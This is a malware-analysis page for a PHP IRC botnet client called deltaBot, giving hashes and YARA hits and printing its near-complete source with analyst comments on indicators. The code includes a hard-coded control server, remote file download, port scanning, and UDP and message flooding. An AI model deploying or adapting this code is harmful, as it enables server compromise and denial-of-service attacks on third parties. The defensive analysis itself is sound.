Sample details: 854442ecf2f1b59ac05cad1d28e47611 --

Hashes
MD5: 854442ecf2f1b59ac05cad1d28e47611
SHA1: 661c74476be4bc6d8945775e9c567490392f5792
SHA256: db4cc6ee3bb1c9f8d41201a078941d782d617f1d7e0a6a448c3b5678ba115bae
SSDEEP: 192:0aOJaVxdmGNPVWSORqIaBOPqFwwTBLV2e:0aOJaVnmGNPExhCFRx2e
Details
File Type: PHP
Yara Hits
YRP/domain | YRP/IP | YRP/contentis_base64 | YRP/network_irc | YRP/php_uname |
Parent Files
cbf75d6e77363cf88fd3b8bc8e0adc25
Strings
		# deltaBot v0.1.1
# A simple PHP IRC bot to illustrate the
# inner workings of a traditional botnet.
# By using this script you agree that the
# creator is by no means responsible for
# your actions and cannot be held liable
# for any damage you might inflict to
# third-party property. This file has been
# created for educational purposes only,
# during the writing of an article on
# botnets and information security for
# a magazine publication in Greece.
# Please leave feedback at: bruteforce.gr/deltabot
# This file is distributed under the terms of GPLv3.
//Remove PHP's execution time limit so the request that runs the bot is never cut off.
//Analyst note: the effect is a PHP request that stays alive for as long as the IRC
//connection is open, which is a usable host-level indicator on a web server.
set_time_limit(0);
//Turn on error display for the response that carries the bot's output.
ini_set('display_errors', 'on');
//deltaBot: IRC-controlled bot class as recovered in this sample's strings.
//NOTE(review): this listing is a strings dump; lines that held only a brace, and the
//closing ");" of $config, are absent, so the code is not syntactically complete as shown.
class deltaBot {
	//Do you run it locally or on a (zombie) server?
	//When TRUE, start() registers with a fixed "127.0.0.1 localhost" USER line instead of $_SERVER values.
	var $localhost = TRUE;
	//Bot's version
	var $version = '0.1.1';
	//IRC server connection details
	//Analyst note: 'server', 'port' and 'channel' are the control endpoint configured in
	//this sample; treat them as network indicators for this specific file.
	//'pass' is empty here, so start() skips the PASS step.
	//'maxrand' is the upper bound of the random number appended to 'nick' in start().
	var $config = array( 
	'server' => '37.59.98.48', 
	'port'   => 1256, 
	'channel' => '#pollo',
	'name'   => 'CAOS PHP Irc Bot',
	'nick'   => 'deltaBot',
	'pass'   => '',
	'maxrand' => 150,
	//Variable to store our IRC connection
	var $conn;
	//Array to save the server/client messages using explode()
	var $ex = array();
	//Function that starts the bot and connects to the IRC server
	//Opens the IRC connection, registers (PASS/USER/NICK), joins the configured
	//channel and hands over to main(), which loops until the connection ends.
	function start()
		//TCP connect to the configured server/port with a 30 second timeout.
		//The return value is not checked before it is used by send() and main().
		$this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30);
		if(strlen($this->config['pass']) > 0)
			//Analyst note: the string has no "$this->", so the literal text
			//config['pass'] would be sent instead of the configured password.
			$this->send("PASS config['pass']");
		if(!$this->localhost) { 
			//Analyst note: the USER line discloses the host's SERVER_ADDR and
			//SERVER_NAME to the IRC server.
			$this->send("USER ".$this->config['nick']." ".$_SERVER['SERVER_ADDR']." ".$_SERVER['SERVER_NAME']." :".$this->config['name']); 
		else {
			$this->send("USER deltaBot 127.0.0.1 localhost :".$this->config['name']);
		//Nick is the configured nick followed by a random integer in 0..maxrand
		//(here "deltaBot" plus 0-150), a pattern that can be matched in IRC traffic.
		$this->send("NICK ".$this->config['nick'].mt_rand(0,$this->config['maxrand']));
		$this->join($this->config['channel']);
		$this->main();
	//Bot's main function
	//Read loop: takes one line at a time from the IRC socket, echoes it to the
	//page, answers PING, and dispatches on the fourth space-separated token.
	//Analyst note: no check of the sender or of the target channel is visible
	//before dispatch; the command is chosen from the fourth token alone, and the
	//remaining tokens are passed to the handlers without validation.
	function main()
		while(!feof($this->conn))
			//Take the data from the server and remove \r\n
			//fgets() with length 256 returns at most 255 bytes per call, so a
			//longer line is read in more than one pass.
			$data = trim(fgets($this->conn, 256));
			//Raw server data is written to the page without HTML escaping.
			echo $data;
			flush();
			//Break messages into their components
			$this->ex = explode(' ', $data);
			//Play ping pong with the IRC server to stay connected
			if($this->ex[0] == 'PING')
				$this->send("PONG ".$this->ex[1]); 
			//The 4th word of each message corresponds to the given command
			//"@" hides the undefined-index notice for lines with fewer than four tokens.
			@$command = $this->ex[3];
			//List of available commands, executable by the bot
			switch($command) 
			{                      
				//Join a channel, syntax: !join <#channel1> [#channel2]
			case ':!join':
				for($i=4; $i<(count($this->ex)); $i++)
					$this->join($this->ex[$i]);
				break;                     
				//Part from a channel, syntax: !part <#channel1> [#channel2]
			case ':!part':
				for($i=4; $i<(count($this->ex)); $i++)
					$this->part($this->ex[$i]);
				break;   
				//Say something to a user/channel, syntax: !say <user/#channel> <message>
			case ':!say':
				$message = "";
				//The "<=" bound reads one index past the last token on the final pass.
				for($i=5; $i<=(count($this->ex)); $i++)
					$message .= $this->ex[$i]." ";
				}		
				$this->send("PRIVMSG ".$this->ex[4]." :$message");
				break;                        		
				//Display the bot's version, syntax: !version
			case ':!version':
				$this->send("PRIVMSG ".$this->config['channel']." :".$this->version);
				break;
				//Display each zombie's uptime, syntax: !uptime
				//Analyst note: system() starts an external "uptime" process from the
				//PHP process; a web-server child spawning commands is a host indicator.
			case ':!uptime':
				$uptime = system("uptime");
				$this->send("PRIVMSG ".$this->config['channel']." :$uptime");
				break;
				//Display information about each zombie's web server, syntax: !server
				//Reports SERVER_SOFTWARE and DOCUMENT_ROOT to the channel.
			case ':!server':
				$software = $_SERVER['SERVER_SOFTWARE'];
				$docroot = $_SERVER['DOCUMENT_ROOT'];
				$this->send("PRIVMSG ".$this->config['channel']." :Server: $software, Document Root: $docroot");
				break;
				//Display system information about each zombie, syntax: !system
				//Reports the php_uname() string to the channel.
			case ':!system':
				$this->send("PRIVMSG ".$this->config['channel']." :".php_uname());
				break;
				//Download a file to each zombie, syntax: !download <URL> [path]
				//Analyst note: when no path is given the file is written to
				//'/tmp/file.delta', a file-system indicator for this sample.
			case ':!download':
				if(!isset($this->ex[4])) 
				{ 
					$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the file's URL!]");
					break; 
				if(!isset($this->ex[5]))
					$path = '/tmp/file.delta';
				else
					$path = $this->ex[5];
				$this->download($this->ex[4], $path);
				break;
				//Flood a user/channel, syntax: !tsunami <user/#channel> [rounds]
				//Sends one fixed PRIVMSG per second for $rounds rounds (default 20);
				//the rounds value is taken from the message as-is.
			case ':!tsunami':
				$tsunami = "TSUNAMIIII!! hahah!!";
				if(!isset($this->ex[4])) 
				{ 
					$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the user/#channel to flood!]");
					break; 
				if(isset($this->ex[5]))
					$rounds = $this->ex[5];
				else
					$rounds = 20;
				$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting Tsunami flood @ ".$this->ex[4]." for $rounds rounds...\002]");
				for($i=0; $i<$rounds; $i++)
					$this->send("PRIVMSG ".$this->ex[4]." :$tsunami");
					sleep(1);
				}		
				$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished Tsunami flood @ ".$this->ex[4]." for $rounds rounds!\002]");
				break;   
				//Scan a host/IP for open ports, syntax: !portscan <host/IP> [comma separated ports]
			case ':!portscan':
				if(!isset($this->ex[4])) 
				{ 
					$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the host/IP to scan!]");
					break; 
				$host = $this->ex[4];
				if(isset($this->ex[5]))
					$ports = $this->ex[5];
				else
					$ports = '21,22,23,25,53,80,110,443,445,8080';
				$this->portscan($host, $ports);
				break;
				//Flood a host/IP using UDP packets, syntax: !udpflood <host/IP> [duration]
			case ':!udpflood':
				if(!isset($this->ex[4])) 
				{ 
					$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the host/IP to flood!]");
					break; 
				$host = $this->ex[4];
				if(isset($this->ex[5]))
					$duration = $this->ex[5];
				else
					$duration = 30; //
				$this->udpflood($host, $duration);
				break;
				//Restart the bot, syntax: !restart
				//restart() only prints a meta refresh tag; the script then exits.
			case ':!restart':
				$this->restart();
				exit;
				//Shutdown the bot, syntax: !shutdown
			case ':!shutdown':
				$this->shutdown();
				exit;
				//Display help, syntax: !help
			case ':!help':
				$this->help();
				break;
	//Sends messages to the IRC server and displays them in the browser
	//Writes $msg plus CRLF to the IRC socket and echoes the same text to the page.
	//Analyst note: $msg often contains tokens taken from received IRC lines and is
	//neither filtered before the socket write nor HTML-escaped before the echo.
	function send($msg) 
		fputs($this->conn, $msg."\r\n");
		echo '<strong>'.$msg.'</strong><br />';
	//Joins a channel
	//Sends an IRC JOIN for $channel; the value is used exactly as passed in.
	function join($channel)
		$this->send("JOIN $channel");
	//Parts from a channel
	//Sends an IRC PART for $channel; the value is used exactly as passed in.
	function part($channel)
		$this->send("PART $channel");
	//Restarts the bot
	//Prints a meta refresh tag asking the viewing browser to reload the page after
	//5 seconds. Nothing else happens here; main() exits right after calling this,
	//so a restart depends on a browser still having the page open.
	function restart()
		echo "<meta http-equiv=\"refresh\" content=\"5\">";
	//Shutdowns the bot
	//Sends IRC QUIT followed by the configured 'name'; main() exits after calling this.
	function shutdown()
		$this->send("QUIT ".$this->config['name']);
	//Downloads a file to each zombie
	//Fetches $url with file() and writes the returned lines to $path, reporting
	//progress and failures to the configured channel.
	//Analyst note: both arguments arrive from the IRC message via main(), so this
	//is an arbitrary file write with the PHP process's permissions. file() on a
	//remote URL depends on PHP's allow_url_fopen setting being enabled.
	function download($url, $path)
		//The destination is opened (and truncated) before the URL is fetched.
		if(!$fp = fopen($path, "w"))
			$this->send("PRIVMSG ".$this->config['channel']." :[--> You don't have write permissions to $path, please choose another path!]");
		else
			if(!$get = file($url))
				$this->send("PRIVMSG ".$this->config['channel']." :[--> Unable to download file, please check the URL!]");
			else
				$this->send("PRIVMSG ".$this->config['channel']." :[\002Downloading file from $url to $path ...\002]");
				for($i=0; $i<count($get); $i++)
					fwrite($fp, $get[$i]);
				$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished download!\002]");
			fclose($fp);
	//Runs a port scan against a host/IP
	//Tries a TCP connection to $host on each port of the comma-separated $ports
	//list and reports every port as OPEN or CLOSED to the configured channel.
	//Analyst note: on the network this is a sequence of outbound TCP connection
	//attempts from the web host to a single destination, one per listed port.
	function portscan($host, $ports)
		$port = array();
		$port = explode(',',$ports);
		$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting Port Scan @ ".$host." for ".(count($port))." ports...\002]");
		for($i=0; $i<(count($port)); $i++)
			//10 second timeout per port; "@" hides the connection warning.
			$fp = @fsockopen($host, $port[$i], $e, $s, 10);
			if($fp)
				$this->send("PRIVMSG ".$this->config['channel']." :[Port ".$port[$i]." @ ".$host." is OPEN]");
				fclose($fp);
			else
				$this->send("PRIVMSG ".$this->config['channel']." :[Port ".$port[$i]." @ ".$host." is CLOSED]");
		$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished Port Scan @ ".$host." for ".(count($port))." ports!\002]");		
	//Executes a UDP flood attack against a host/IP
	//Sends one fixed 256-byte random payload over UDP to $host on randomly chosen
	//ports until $duration seconds have passed, announcing start and end in the channel.
	//Analyst note: the observable pattern is a burst of outbound UDP datagrams with
	//an identical 256-byte payload from a web host to one destination across ports
	//0-8080. Egress filtering of UDP from the web tier limits the effect.
	function udpflood($host, $duration)
		//The payload is built once and reused for every datagram.
		$packet = "";
		for($i=0; $i<256; $i++)
			$packet .= chr(mt_rand(0,255));
		$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting UDP flood attack @ $host for $duration seconds...\002]");
		//$duration is taken from the IRC message as-is and added to the current time.
		$max_time = time() + $duration;
		while(time() < $max_time) 
			if($fp = fsockopen('udp://'.$host, mt_rand(0,8080), $e, $s, 5))
				fwrite($fp, $packet);
				fclose($fp);
		$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished UDP flood attack @ $host !\002]");
	//Displays available bot commands
	//Posts the list of supported commands to the configured channel as four PRIVMSG lines.
	//Analyst note: these fixed strings appear verbatim in IRC traffic and in the
	//file itself, so they can serve as content signatures for this sample.
	function help()
		$this->send("PRIVMSG ".$this->config['channel']." :[\002List of available commands\002]");
		$this->send("PRIVMSG ".$this->config['channel']." :[!say, !join, !part, !restart, !shutdown]");
		$this->send("PRIVMSG ".$this->config['channel']." :[!download, !tsunami, !portscan !udpflood]");
		$this->send("PRIVMSG ".$this->config['channel']." :[!uptime, !server, !system !version !help]");
//Create the bot and start it
//The bot is created and started as soon as the file is executed; there is no
//guard or parameter check in front of it.
$bot = new deltaBot;
//start() connects and then calls main(), which loops until the IRC connection ends.
$bot->start();